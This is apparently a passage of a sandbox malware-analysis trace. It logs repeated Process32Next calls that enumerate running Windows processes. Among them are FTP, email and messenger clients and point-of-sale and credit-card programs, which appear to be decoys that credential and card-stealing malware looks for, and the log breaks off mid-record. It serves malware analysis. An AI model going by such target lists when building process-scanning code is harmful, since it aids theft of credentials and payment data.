Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0281.305] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0281.307] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.308] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.314] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0281.316] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.317] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.319] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.321] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.323] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.379] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.380] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.382] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0281.383] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0281.385] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0281.386] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.390] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0281.392] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0281.393] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0281.395] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0281.396] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.398] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0281.399] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0281.401] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0281.402] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0281.406] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0281.408] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0281.409] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0281.411] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0281.412] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0281.414] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0281.415] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0281.417] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0281.456] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0281.458] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0281.460] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0281.461] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0281.463] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0281.464] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0281.468] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0281.470] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0281.471] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0281.473] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0281.474] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0281.476] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0281.477] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0281.479] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0281.480] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0281.484] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0281.486] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0281.487] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0281.489] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0281.491] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0281.492] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0281.494] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0281.528] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0281.532] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0281.534] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0281.536] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0281.538] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0281.539] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0281.541] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0281.547] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0281.548] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0281.550] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0281.552] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0281.554] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0281.555] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0281.557] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0281.559] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0281.563] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0281.565] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0281.567] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0281.568] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0281.570] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0281.572] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0281.573] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0281.673] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0281.675] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0281.676] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0281.678] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0281.679] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0281.681] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0281.683] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, 